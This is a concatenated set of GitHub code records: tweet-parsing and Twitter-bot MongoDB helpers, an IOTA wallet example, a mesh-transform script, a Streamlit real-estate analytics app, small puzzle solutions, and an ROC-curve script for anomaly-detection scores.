Might investigate later!\n list_of_field.append(\"None\")\n\n # # Bounding Box - Point 1\n # try:\n # list_of_field.append(tweet.get('place').get('bounding_box').get('coordinates')[0][0])\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # # Bounding Box - Point 3\n # try:\n # list_of_field.append(tweet.get('place').get('bounding_box').get('coordinates')[0][2])\n # except AttributeError:\n # list_of_field.append(\"None\")\n \n # # Full Text\n # try: \n # text = tweet.get('extended_tweet').get('full_text')\n # text_re = text.replace(\"\\n\",\" \").replace(\"\\r\",\" \").replace(\"\\\\n\" , \" \")\n # except AttributeError:\n # try:\n # text = tweet.get('text')\n # text_re = text.replace(\"\\n\",\" \").replace(\"\\r\",\" \").replace(\"\\\\n\" , \" \")\n # except:\n # text_re = \"None\"\n # list_of_field.append(text_re)\n\n # Hashtags\n hashtags = []\n # If there are multiple hashtags, iterate thru them\n try:\n for hashtag in tweet.get('extended_tweet').get('entities').get('hashtags'):\n hashtags.append(hashtag.get('text'))\n # Add all hashtags as a list element to the list of field\n list_of_field.append(hashtags)\n except AttributeError:\n try:\n # If there are multiple mentions, iterate thru them\n for hashtag in tweet.get('entities').get('hashtags'):\n hashtags.append(hashtag.get('text'))\n # Add all hashtags as a list element to the list of field\n list_of_field.append(hashtags)\n # If there are no hashtags\n except:\n list_of_field.append(\"None\")\n\n # Add this list to the bigger list\n list_of_tweets.append(list_of_field)\n\n return list_of_tweets\n\n# Parallelization Function (parallel read)\ndef parallel_read(path_list) -> list:\n '''\n param path_list (iterable): list of paths containing tweets\n return tweets (iterable): list containing several lists, each of which contain tweets as json objects\n '''\n # List containing File_num/N number of lists, each containing dictionaries of tweets\n tweets = []\n # Init parallel process\n with Pool() as pool_exec:\n # mapping the read_and_write function onto the list of file paths\n results = pool_exec.map(read_and_write , path_list)\n # Iterating through Generator Object\n for result in results:\n tweets.append(result)\n return tweets","repo_name":"sourasen1011/Introduction_to_Data_Science_Coursework","sub_path":"Twitter_Coursework/helper_func_2.py","file_name":"helper_func_2.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9223308995","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom iota_sdk import Wallet\n\n# In this example we will get outputs stored in the account\n\n# This example uses secrets in environment variables for simplicity which\n# should not be done in production.\nload_dotenv()\n\nwallet = Wallet(os.environ['WALLET_DB_PATH'])\n\naccount = wallet.get_account('Alice')\naccount.sync()\n\n# All outputs stored in the account\noutputs = account.outputs()\n\n# Print all output ids\nprint('Output ids:')\nfor output in outputs:\n print(output.outputId)\n\n# All unspent outputs stored in the account\noutputs = account.unspent_outputs()\n\n# Print all unspent output ids\nprint('Unspent output ids:')\nfor output in outputs:\n 
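# note: each entry appears to expose its id as the camelCase attribute 'outputId' in this iota_sdk binding\n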
print(output.outputId)\n","repo_name":"iotaledger/iota-sdk","sub_path":"bindings/python/examples/how_tos/accounts_and_addresses/list_outputs.py","file_name":"list_outputs.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"20656304025","text":"import pprint\nimport re\nimport time\n\nimport tweepy\n\nfrom ParsedTweet import ParsedTweet\nfrom TweetAuthor import TweetAuthor\nfrom constants import *\nfrom helpers.google_helpers import mark_tweet_as_posted_on_wks\nfrom helpers.mongo_helpers import init_mongo_client, get_all_known_authors, insert_parsed_tweets_to_mongodb, \\\n insert_many_tweets_to_seen_db, get_total_num_replacements, get_oldest_seen_tweet_id_mongo, \\\n get_most_recent_seen_tweet_id_mongo\nfrom helpers.twitter_helpers import init_twitter_client, get_twitter_user, get_user_most_recent_tweet\nfrom replacement_filter import apply_replacement_filter\n\n\ndef tweet_is_eligible(parsed_tweet: ParsedTweet) -> bool:\n if not isinstance(parsed_tweet, ParsedTweet):\n raise Exception(f'Invalid Tweet Object: {parsed_tweet}')\n return parsed_tweet.is_eligible\n\n\ndef sort_by_tweet_id(tweet) -> str:\n return str(tweet[\"tweet_id\"])\n\n\ndef get_date_for_tweet_by_id(t_id, twitter_client):\n t = twitter_client.get_tweet(id=t_id, tweet_fields=[\"id\", \"text\", \"created_at\"], expansions=[\"author_id\"])\n return t.data[\"created_at\"]\n\n\ndef get_tweet_url(tweet_id: str, username: str) -> str:\n return f'{BASE_URL}{username}/status/{tweet_id}'\n\n\ndef extract_tweet_id_from_url(url: str) -> str:\n str_url = str(url)\n if BASE_URL not in str_url:\n raise Exception(f'Invalid URL, must start with \"{BASE_URL}\"')\n id_extract_re = re.compile(f'{BASE_URL}[A-Za-z0-9]*\\/status\\/', re.IGNORECASE)\n tweet_id = re.sub(id_extract_re, '', str_url)\n return str(tweet_id)\n\n\ndef get_parsed_author_obj(author_from_db) -> TweetAuthor:\n return TweetAuthor(\n name=author_from_db[\"name\"],\n username=author_from_db[\"username\"],\n author_id=author_from_db[\"author_id\"]\n )\n\n\ndef get_parsed_tweet_obj(tweet, author: TweetAuthor) -> ParsedTweet:\n if not isinstance(author, TweetAuthor):\n raise Exception('Invalid type for \\\"author\\\"'\n f' (expected TweetAuthor, provided {type(author)})')\n filterInfo = apply_replacement_filter(tweet[\"text\"])\n res = ParsedTweet(\n author=author,\n tweet_id=str(tweet[\"id\"]),\n num_replacements=filterInfo[\"num_replacements\"],\n original_text=filterInfo[\"original_text\"],\n modified_text=filterInfo[\"modified_text\"],\n tweet_url=f'{BASE_URL}{author.username}/status/{tweet[\"id\"]}',\n created_at=tweet[\"created_at\"],\n repl_freq_map=filterInfo[\"replaced_key_freq\"]\n )\n return res\n\n\ndef get_most_recent_seen_tweet_id(author_id=None, use_prod: bool = False):\n seen_tweet_db = init_mongo_client(use_prod=use_prod)[DB_SEEN_COLLECTION_NAME]\n find_query = {}\n if author_id:\n auth_id = str(author_id)\n find_query = {\"author.author_id\": auth_id}\n # Check if at least one tweet from this author has been seen before in MongoDB\n num_seen = seen_tweet_db.count_documents(find_query)\n if num_seen is None or num_seen <= 0:\n # if no Tweet from this author has been seen before in Mongo,\n # get the most recent tweet from this Twitter User\n recent_tweet = get_user_most_recent_tweet(target_id=author_id)\n if recent_tweet:\n return None\n # return str(recent_tweet.id)\n else:\n raise Exception(\"Invalid author\")\n else:\n return 
get_most_recent_seen_tweet_id_mongo(author_id=author_id, use_prod=use_prod)\n # if no specified author\n return get_most_recent_seen_tweet_id_mongo(use_prod=use_prod)\n\n\ndef drop_unposted_tweets(use_prod: bool = False):\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n posted_res = tweet_db.find({\"posted\": True}).sort(\"_id\", 1)\n posted_ids = list()\n posted_text = set()\n for t in posted_res:\n posted_ids.append(t[\"_id\"])\n posted_text.add(t[\"modified_text\"])\n return tweet_db.delete_many(filter={\"$and\": [{\"posted\": False}, {\"_id\": {\"$nin\": posted_ids}}]})\n\n\ndef drop_eligible_duplicates(use_prod: bool = False):\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n seen_db = db[DB_SEEN_COLLECTION_NAME]\n # get all posted tweets\n posted_res = tweet_db.find({\"posted\": True}).sort(\"_id\", 1)\n posted_ids = set()\n posted_text = set()\n for t in posted_res:\n posted_ids.add(t[\"_id\"])\n posted_text.add(t[\"modified_text\"])\n # get all unposted tweets\n unposted_res = tweet_db.find({\"posted\": False}).sort(\"_id\", 1)\n\n seen = set()\n unposted_mod_text = set()\n u_ids = list()\n for t in unposted_res:\n mod_txt = t[\"modified_text\"]\n seen.add(t[\"_id\"])\n if mod_txt not in unposted_mod_text and mod_txt not in posted_text:\n unposted_mod_text.add(mod_txt)\n u_ids.append(t[\"_id\"])\n delete_res = tweet_db.delete_many(filter={\"$and\": [{\"posted\": False}, {\"_id\": {\"$nin\": u_ids}}]})\n return delete_res\n\n\ndef revisit_insert_helper(seen_db, tweet_db, show_output: bool, parsed_tweets):\n if show_output:\n print(f'Inserting {len(parsed_tweets)} docs...')\n seen_res = insert_many_tweets_to_seen_db(seen_db=seen_db, parsed_tweets=parsed_tweets)\n insert_res = insert_parsed_tweets_to_mongodb(tweet_db=tweet_db, parsed_tweets=parsed_tweets)\n num_skipped = insert_res[\"num_skipped\"]\n if show_output:\n print(f'{num_skipped} skipped.')\n pprint.pprint(seen_res)\n pprint.pprint(insert_res)\n return num_skipped\n\n\ndef revisit_seen_tweets(show_output=False, use_prod: bool = False):\n # refresh Mongo connections\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n seen_db = db[DB_SEEN_COLLECTION_NAME]\n author_db = db[DB_AUTHORS_COLLECTION_NAME]\n num_seen_start = seen_db.count_documents({})\n num_eligible_start = tweet_db.count_documents({})\n drop_unposted_tweets(use_prod=use_prod)\n posted_tweets = tweet_db.find({\"posted\": True})\n posted_ids = set()\n for t in posted_tweets:\n posted_ids.add(str(t[\"tweet_id\"]))\n\n if show_output:\n print(f\"Num Seen (start): {num_seen_start}\")\n print(f\"Num Eligible (start): {num_eligible_start}\")\n # refresh Twitter client\n twitter_client = init_twitter_client()\n all_seen_tweet_docs = seen_db.find({}, {\"_id\": 1, \"tweet_id\": 1}).sort(\"_id\", -1)\n\n # get list of IDs for all the \"seen\" tweets\n to_visit_ids = list()\n for t in all_seen_tweet_docs:\n tweet_id = str(t[\"tweet_id\"])\n if tweet_id not in posted_ids:\n to_visit_ids.append(str(t[\"tweet_id\"]))\n\n # have to split list into segments of 100 because twitter API only allows 100 at a time\n split_size = 100\n a_splitted = [to_visit_ids[x:x + split_size] for x in range(0, len(to_visit_ids), split_size)]\n\n known_authors_res = get_all_known_authors(author_db=author_db, use_prod=use_prod)\n authors = list(map(lambda x: get_parsed_author_obj(x), known_authors_res))\n auth_dict = {}\n total_num_skipped = 0\n total_num_retrieved = 0\n for a in authors:\n 
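# build an id -> TweetAuthor lookup; retrieved tweets are matched back to their authors through this dict below\n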
auth_dict[str(a.author_id)] = a\n\n tweet_objs = list()\n for segment in a_splitted:\n retrieved_tweets = twitter_client.get_tweets(\n ids=segment,\n expansions=\"author_id\",\n tweet_fields=[\"id\", \"text\", \"created_at\"],\n user_fields=[\"username\"]\n )\n total_num_retrieved += len(retrieved_tweets.data)\n if show_output:\n print(f'{len(retrieved_tweets.data)} Tweets retrieved.')\n\n # newly_retrieved_objs = list(map(lambda x: get_parsed_tweet_obj(x, auth_dict[str(x[\"author_id\"])]), retrieved_tweets.data))\n newly_retrieved_objs = [get_parsed_tweet_obj(x, auth_dict[str(x[\"author_id\"])]) for x in retrieved_tweets.data]\n tweet_objs.extend(newly_retrieved_objs)\n # minimize frequency of DB queries\n if len(tweet_objs) > 800:\n skipped = revisit_insert_helper(\n seen_db=seen_db,\n tweet_db=tweet_db,\n show_output=show_output,\n parsed_tweets=tweet_objs\n )\n total_num_skipped += skipped\n tweet_objs = list()\n\n # One more for good measure\n if len(tweet_objs) > 0:\n skipped = revisit_insert_helper(\n seen_db=seen_db,\n tweet_db=tweet_db,\n show_output=show_output,\n parsed_tweets=tweet_objs\n )\n total_num_skipped += skipped\n if show_output:\n print('Done.')\n print(f\"startNum: {num_eligible_start}\")\n print(f\"Total retrieved: {total_num_retrieved}\")\n print(f\"Total skipped: {total_num_skipped}\")\n print(f\"Net: {total_num_retrieved - total_num_skipped}\")\n drop_eligible_duplicates(use_prod=use_prod)\n\n\ndef mark_tweet_as_posted(tweet_id: str, tweet_db=None, use_prod: bool = False):\n if tweet_db is None:\n tweet_db = init_mongo_client(use_prod=use_prod)[DB_TWEET_COLLECTION_NAME]\n post_q_db = init_mongo_client(use_prod=use_prod)[DB_POST_Q_COLLECTION_NAME]\n found_tweet = tweet_db.find_one({\"_id\": str(tweet_id)})\n found_q = post_q_db.find_one({\"_id\": str(tweet_id)})\n if found_tweet and not found_tweet[\"posted\"]:\n t_id = found_tweet[\"_id\"]\n update_res = tweet_db.update_one(filter={\"_id\": str(t_id)}, update={\"$set\": {\"posted\": True}})\n update_res_2 = post_q_db.update_one(filter={\"_id\": str(tweet_id)}, update={\"$set\": {\"posted\": True}})\n # Update google doc\n mark_tweet_as_posted_on_wks(str(t_id))\n return True\n return False\n\n\n# =============== UNIT CONVERSIONS =========\n\n\ndef hours_to_seconds(num_hours: float = 1.0) -> float:\n num_seconds = round(num_hours * SECONDS_PER_HOUR, 2)\n if num_seconds < MIN_INTERVAL_SECONDS:\n raise Exception(f'Interval must be longer than {MIN_INTERVAL_SECONDS}')\n return num_seconds\n\n\ndef minutes_to_seconds(num_minutes: int = DEFAULT_INTERVAL_MINUTES) -> float:\n num_seconds = round(num_minutes * SECONDS_PER_MINUTE, 2)\n if num_seconds < MIN_INTERVAL_SECONDS:\n raise Exception(f'Interval must be longer than {MIN_INTERVAL_SECONDS}')\n return num_seconds\n\n\ndef seconds_to_minutes(num_seconds: float) -> float:\n num_minutes = round((num_seconds / SECONDS_PER_MINUTE), 3)\n return num_minutes\n\n\ndef seconds_to_hours(num_seconds):\n num_hours = round(num_seconds / SECONDS_PER_HOUR, 3)\n return num_hours\n\n","repo_name":"bweir27/NewsRephrased_python","sub_path":"helpers/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":10464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37709994807","text":"from soma import aims\n\n\ndef mesh_transform(path_mesh, path_transfo, path_mesh_out):\n transfo = aims.read(path_transfo)\n mesh = aims.read(path_mesh)\n h = mesh.header()\n aims.SurfaceManip.meshTransform(mesh, transfo)\n 
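# meshTransform appears to mutate 'mesh' in place (no return value is captured), so the write below persists the transformed geometry\n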
aims.write(mesh, path_mesh_out)\n pass\n\n\nif __name__ == \"__main__\":\n\n from configuration.configuration import (\n SUBJ_LIST,\n MESHES_TYPE,\n SIDES,\n T1_2_DWI,\n MESHES_BRAINVISA,\n )\n\n for i, subject in enumerate(SUBJ_LIST):\n for mesh_type in MESHES_TYPE:\n for side in SIDES.keys():\n mesh_transform(\n MESHES_BRAINVISA[(subject, side, mesh_type, \"t1\")],\n T1_2_DWI,\n MESHES_BRAINVISA[(subject, side, mesh_type, \"dwi\")],\n )\n","repo_name":"alexpron/article_central_sulcus_connectivity","sub_path":"scripts/pipeline/b_mri_processing/structural/d_apply_linear_transform_mesh.py","file_name":"d_apply_linear_transform_mesh.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71587557904","text":"import geopandas\nimport streamlit as st\nimport pandas as pd\nimport folium\nfrom datetime import datetime\nimport mysql.connector as connection\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import StrMethodFormatter, NullFormatter\nimport plotly.express as px\n\nfrom streamlit_folium import folium_static\n\n\nst.set_page_config( layout='wide' )\n\nst.image('UfraLogo.png', width=300)\nst.title('Real Estate Analytics App')\n\n# ----(Loading Mapbox Token)----\n\ntoken = open(r'MapboxToken.txt').read()\n\n@st.cache( allow_output_mutation=True )\ndef get_data(Host, Database, User, Passwd, Query):\n try:\n mydb = connection.connect(host=Host, database=Database, user=User, passwd=Passwd, use_pure=True) # connect to the DB\n query = Query # query on the houses table\n data = pd.read_sql(query,mydb) # save the query result into a pandas dataframe\n mydb.close() # close the DB connection\n except Exception as e:\n mydb.close()\n print(str(e))\n\n return data\n\n\n@st.cache( allow_output_mutation=True )\ndef get_geofile( url ):\n geofile = geopandas.read_file( url )\n\n return geofile\n\n#---------------------------------------------\n#----(Loading data from the database)---------\n#---------------------------------------------\nHost=\"localhost\"\nDatabase ='housedb'\nUser=\"root\"\nPasswd=\"Master2010\"\nQuery=\"Select * from houses;\"\n\ndata = get_data(Host, Database, User, Passwd, Query)\n\n\n\n#---------------------------------------------\n#------------(Generate geofile)---------------\n#---------------------------------------------\n\nurl = 'https://opendata.arcgis.com/datasets/83fc2e72903343aabff6de8cb445b81c_2.geojson'\ngeofile = get_geofile( url )\n\n\n\n#---------------------------------------------\n#------(Creating / Modifying Columns )--------\n#---------------------------------------------\n\n\n# Editing the dates column - to datetime in Year-Month-Day format\ndata['dates'] = pd.to_datetime(data['dates']).dt.strftime('%Y-%m-%d')\n\n# Creating the \"year\" column as datetime in Year format\ndata['year'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y' )\n\n# Creating the \"year_week\" column as datetime in Year-Week format\ndata['year_week'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y-%U' )\n\n# Creating the \"is_waterfront\" column\ndata['is_waterfront'] = data['waterfront'].apply( lambda x: 'sim' if x == 1 else 'não' )\n\n\n\n#---------------------------------------------\n#------(Data selection - sidebar menu)--------\n#---------------------------------------------\n\nst.sidebar.title('Filtros')\n# Postal code\nf_zipcode = st.sidebar.multiselect( 'Selecione o código postal', data['zipcode'].unique() )\n\n# Filter - waterfront view\n\nf_isWaterfront = 
st.sidebar.checkbox('De frente para o mar')\n\n# Price\nmin_price = int( data['price'].min() )\nmax_price = int( data['price'].max() )\navg_price = int( data['price'].max() )\nf_price = st.sidebar.slider( 'Preço máximo', min_price, max_price, avg_price, step=1 )\n\n# Minimum living room size\nmin_living = int( data['sqft_living'].min() )\nmax_living = int( data['sqft_living'].max() )\navg_living = int( data['sqft_living'].min() )\nf_living = st.sidebar.slider( 'Tamanho mínimo da sala de estar', min_living, max_living, avg_living, step=1 )\n\n# Filter - minimum number of bathrooms\nmin_bathrooms = int( data['bathrooms'].min() )\nmax_bathrooms = int( data['bathrooms'].max() )\navg_bathrooms = int( data['bathrooms'].min() )\nf_bathrooms = st.sidebar.slider( 'Numéro mínimo de banheiros', min_bathrooms, max_bathrooms, avg_bathrooms, step=1 )\n\n# Filter - minimum basement size\nmin_basement = int( data['sqft_basement'].min() )\nmax_basement = int( data['sqft_basement'].max() )\navg_basement = int( data['sqft_basement'].min() )\nf_basement = st.sidebar.slider( 'Tamanho mínimo de sótão', min_basement, max_basement, avg_basement, step=1 )\n\n# Filter - minimum condition\nmin_conditions = int( data['conditions'].min() )\nmax_conditions = int( data['conditions'].max() )\navg_conditions = int( data['conditions'].min() )\nf_conditions = st.sidebar.slider( 'Condição Mínima', min_conditions, max_conditions, avg_conditions, step=1 )\n\n\n# setup filters\nmin_date = datetime.strptime( data['dates'].min(), '%Y-%m-%d' )\nmax_date = datetime.strptime( data['dates'].max(), '%Y-%m-%d' )\nf_date = st.sidebar.slider( 'data', min_date, max_date, max_date )\n\n\n\n\n\n#OK\nif ( (f_zipcode != []) & (f_isWaterfront)):\n data = data.loc[data['zipcode'].isin( f_zipcode ) & (data['waterfront'] == 1)]\n#OK\nelif ( (f_zipcode != []) & (not f_isWaterfront) ):\n data = data.loc[data['zipcode'].isin( f_zipcode )]\n#ok\nelif ( (f_zipcode == []) & (f_isWaterfront)):\n data = data.loc[data['waterfront'] == 1]\n\nelse:\n data = data[(data['price'] < f_price) &\n (data['sqft_living'] > f_living) &\n (data['bathrooms'] > f_bathrooms) &\n (data['sqft_basement'] > f_basement) &\n (data['conditions'] > f_conditions) &\n (data['dates'] < f_date.strftime( '%Y-%m-%d' ))]\n \n\n\n\n\n#----------------------------------------------\n#---------(Loading the data frame)-------------\n#----------------------------------------------\n\nst.title( 'Dados' )\nst.write( data.head(10) )\n\n\n#----------------------------------------------\n#----------(Map of Houses)----------------\n#----------------------------------------------\n\n\n\nst.title( 'Casas Disponíveis' )\n\nfig = px.scatter_mapbox( data, \n lat=\"lat\", \n lon=\"lon\", \n color_discrete_sequence=['Gainsboro'],\n size_max=15, \n height=300,\n zoom=10)\n\nfig.update_layout(mapbox_style='dark', mapbox_accesstoken=token)\nfig.update_layout(height=600, margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n\n\nst.plotly_chart(fig)\n\n\n\n\n#----------------------------------------------\n#----------(Price Density)---------------------\n#----------------------------------------------\n\n\nst.title( 'Densidade de preço' )\n\n\ndf = data[['price', 'zipcode']].groupby( 'zipcode' ).mean().reset_index()\ndf.columns = ['ZIP', 'PRICE']\n\ngeofile = geofile[geofile['ZIP'].isin( df['ZIP'].tolist() )]\n\nregion_price_map = folium.Map( location=[data['lat'].mean(), \n data['lon'].mean() ],\n default_zoom_start=15)\n \nfolium.TileLayer('cartodbdark_matter').add_to(region_price_map)\n\nregion_price_map.choropleth( 
data = df,\n geo_data = geofile,\n columns=['ZIP', 'PRICE'],\n key_on='feature.properties.ZIP',\n fill_color='YlOrRd',\n fill_opacity = 0.7,\n line_opacity = 0.2,\n legend_name='AVG PRICE' )\n\nfolium_static( region_price_map )\n\n\n#----------------------------------------------\n#----------(Business charts)-------------------\n#----------------------------------------------\n\nst.title( 'Gráficos de Negócios' )\n\nfig1 = px.histogram( data, x='price', nbins=50)\nfig2, ax2 = plt.subplots(figsize =(7, 5))\nfig3, ax3 = plt.subplots(figsize =(7, 5))\n\n\n\n# ----(Price distribution histogram)----\n\n\n# Creating Chart 1\nst.title( 'Histograma de distribuição de preço' )\nst.plotly_chart( fig1 )\n\n\n# ----(Chart 2 - Average price per week)----\n\n # Creating Chart 2\nst.title( \"Preço médio por semana\" )\ndata['year_week'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y-%U' )\nby_week_of_year = data[['price', 'year_week']].groupby( 'year_week' ).mean().reset_index()\nax2.bar( by_week_of_year['year_week'], by_week_of_year['price'] )\nax2.tick_params(axis='x', rotation=60)\n\n# Remove scientific notation - Chart 2\nax2.yaxis.set_major_formatter(StrMethodFormatter('{x:.0f}'))\nax2.yaxis.set_minor_formatter(NullFormatter())\n\nst.plotly_chart(fig2, use_container_width=True)\n\n# ----(Chart 3 - Average price per day)----\nst.title( \"Preço médio por dia\" )\n# Creating Chart 3 - Average price per day\nby_day = data[['price', 'dates']].groupby( 'dates' ).mean().reset_index()\nax3.plot( by_day['dates'], by_day['price'] )\nax3.tick_params(axis='x', rotation=60)\n\n# Remove scientific notation - Chart 3\nax3.yaxis.set_major_formatter(StrMethodFormatter('{x:.0f}'))\nax3.yaxis.set_minor_formatter(NullFormatter())\n\nst.plotly_chart(fig3, use_container_width=True)\n\n\n","repo_name":"luizhdramos/Real_Estate_Analytics_APP_UFRA","sub_path":"RealStateAPP.py","file_name":"RealStateAPP.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74440147663","text":"gear = [list(input()) for _ in range(4)]\nK = int(input())\ncmd = [list(map(int, input().split())) for _ in range(K)]\n\n\ndef move(n, d):\n tmp = gear[n][0]\n d *= -1\n for i in range(7):\n gear[n][i * d] = gear[n][d * (i + 1)]\n gear[n][7 * d] = tmp\n\n\n# When rotating gear n, checks whether the gears in\n# [0 ~ n-1] and [n + 1 ~ 3] should move as well\ndef check(n, pre):\n global dir, visited\n # guard first: out-of-range or already-visited gears end the propagation\n if n < 0 or n >= 4 or visited[n]:\n return\n visited[n] = True\n\n # when rotated by another gear, determine which gear it is influenced by\n d = 1 if pre < n else -1\n if n != pre and gear[pre][2 * d] != gear[n][-2 * d]:\n dir[n] = -dir[pre]\n\n check(n - 1, n)\n check(n + 1, n)\n\n\nfor c in cmd:\n n, d = c[0] - 1, c[1]\n dir = [0] * 4\n dir[n] = d\n visited = [False] * 4\n check(n, n)\n for i in range(4):\n if dir[i] != 0:\n move(i, dir[i])\n\nprint(sum(2 ** i for i in range(4) if gear[i][0] == '1'))\n\n# short coding taken from boj\n# from collections import deque\n# GR = [deque(list(map(int, input()))) for _ in range(4)]\n#\n# for _ in range(int(input())):\n#     mid, d = map(int, input().split())\n#     mid -= 1\n#     GR[mid].rotate(d)\n#\n#     l, r = mid-1, mid+1\n#\n#     M, D = mid, d\n#     while 0 <= l and GR[M][6+D] != GR[l][2]:\n#         l, M, D = l-1, l, D*(-1)\n#     GR[M].rotate(D)\n#\n#     M, D = mid, d\n#     while r < 4 and GR[M][2+D] != GR[r][6]:\n#         r, M, D = r+1, r, D * (-1)\n#     GR[M].rotate(D)\n#\n#     print(sum(1< jour : \" + printValue(lastDay) + \" kWh ; mois : \" + printValue(lastMonth) + \" kWh\\n\")\n    print(\"Consommation 
moyenne journalière : \" + printValue(avgDay) + \"/\" + printValue(maxDay) + \" kWh\")\n    print(\"Consommation moyenne mensuelle : \" + printValue(avgMonth) + \"/\" + printValue(maxMonth) + \" kWh\")\n    print(\"Marge pour aujourd'hui : \" + printValue(marginDay) + \" kWh\")\n    print(\"Marge pour ce mois : \" + printValue(marginMonth) + \" kWh\")\n    print(\"\\n\\n\")\n","repo_name":"telec16/LINKY_API","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2513744366","text":"from typing import List\nclass Solution:\n def peakIndexInMountainArray(self, arr: List[int]) -> int:\n \"\"\"\n >>> s = Solution()\n >>> s.peakIndexInMountainArray([0, 10, 5, 2])\n 1\n\n >>> s.peakIndexInMountainArray([3, 4, 5, 1])\n 2\n \"\"\"\n begin, end = 0, len(arr) - 1\n # binary search for the first index whose successor is smaller: the peak\n while begin < end:\n mid = begin + (end-begin)//2\n if arr[mid] < arr[mid+1]:\n begin = mid + 1\n else:\n end = mid\n return begin\nif __name__ == \"__main__\":\n from doctest import testmod\n testmod()","repo_name":"lunarknight00/algorithm_challenges","sub_path":"leetcode/852_Peak_Index_In_a_Mountain_Array.py","file_name":"852_Peak_Index_In_a_Mountain_Array.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24319258125","text":"import argparse\r\nimport os\r\nimport numpy as np\r\n\r\nimport _pathmagic\r\nimport pandas as pd\r\n# from acanogan import acanogan_model,acanogan_predict, acanogan_test\r\nfrom sklearn import metrics\r\nimport matplotlib.pyplot as plt\r\n# import scikitplot as skplt\r\n\r\n\r\ndef load_scores(normal_files, anomaly_files):\r\n def load(file_path):\r\n return pd.read_csv(file_path,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n normal_scores = [load(file_path) for file_path in normal_files]\r\n anomaly_scores = [load(file_path) for file_path in anomaly_files]\r\n return normal_scores, anomaly_scores\r\n\r\n\r\ndef make_roc_dataset(normal, anomaly):\r\n normal[\"y\"] = 0\r\n anomaly[\"y\"] = 1\r\n roc_dataset = pd.concat([normal, anomaly])\r\n return roc_dataset\r\n\r\n\r\ndef cutoff(roc_dataset, fprs, tprs, thresholds, n_avg, a_avg):\r\n \"\"\"\r\n\r\n Args:\r\n fpr:\r\n tpr:\r\n thresholds:\r\n\r\n Returns:\r\n dict:fprs[cutoff_index],tprs[cutoff_index],precision,recall,specificity,f1_score,auc\r\n \"\"\"\r\n # the optimal threshold is the point where tpr - fpr is maximal\r\n cutoff_criterion = tprs - fprs\r\n cutoff_index = cutoff_criterion.argmax()\r\n\r\n pred_label = (roc_dataset[\"score\"] > thresholds[cutoff_index]).astype(int)\r\n tn, fp, fn, tp = metrics.confusion_matrix(\r\n roc_dataset[\"y\"], pred_label, ).ravel()\r\n # recall=tp/(tp+fn)\r\n # precision=tp/(tp+fp)\r\n precision = metrics.precision_score(roc_dataset[\"y\"], pred_label)\r\n recall = metrics.recall_score(roc_dataset[\"y\"], pred_label)\r\n accuracy = metrics.accuracy_score(roc_dataset[\"y\"], pred_label)\r\n specificity = tn / (tn + fp)\r\n f1_score = metrics.f1_score(roc_dataset[\"y\"], pred_label)\r\n auc = metrics.auc(fprs, tprs)\r\n\r\n cutoff_result = {\"precision\": precision,\r\n \"recall\": recall,\r\n \"f1_score\": f1_score,\r\n \"accuracy\": accuracy,\r\n \"auc\": auc,\r\n \"fpr\": fprs[cutoff_index],\r\n \"tpr\": tprs[cutoff_index],\r\n \"specificity\": specificity,\r\n \"normal_score_avg\": n_avg,
\"anomaly_score_avg\": a_avg,}\r\n return cutoff_result\r\n\r\n\r\ndef plot_roc_curve(\r\n roc_curve_data,\r\n save_path=\"output/experiments/roc_curve/roc_test.png\"):\r\n plt.figure(figsize=(9, 9))\r\n # plt.figure(figsize=(5, 5))\r\n plt.rcParams[\"font.size\"] = 25\r\n plt.xlabel('FPR: False Positive Rate')\r\n plt.ylabel('TPR: True Positive Rate')\r\n plt.grid()\r\n plt.rcParams[\"font.size\"] = 20\r\n plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0])\r\n plt.plot([0, 1], [0, 1], color='gray', lw=2, linestyle='--')\r\n # for i, roc_curve_data in enumerate(roc_curve_datas):\r\n plt.plot(\r\n roc_curve_data[\"fprs\"],\r\n roc_curve_data[\"tprs\"],\r\n lw=2)\r\n # plt.legend(loc='lower right')\r\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\r\n plt.savefig(save_path)\r\n # plt.show()\r\n\r\n\r\ndef make_detect_accuracy(normal_file, anomaly_file, plot_save, accuracy_save):\r\n \"\"\"\r\n\r\n Args:\r\n normal_file:\r\n anomaly_file:\r\n plot_save:\r\n accuracy_save:\r\n \"\"\"\r\n normal_score = pd.read_csv(normal_file,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n anomaly_score = pd.read_csv(anomaly_file,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n dataset = make_roc_dataset(normal_score, anomaly_score)\r\n print(dataset.y.to_list())\r\n print(dataset.score.to_list())\r\n fprs, tprs, thres = metrics.roc_curve(\r\n dataset.y.to_list(), dataset.score.to_list())\r\n\r\n\r\n roc_curve_data = {\"fprs\": fprs, \"tprs\": tprs, \"thres\": thres}\r\n n_avg = np.average(normal_score.values)\r\n a_avg 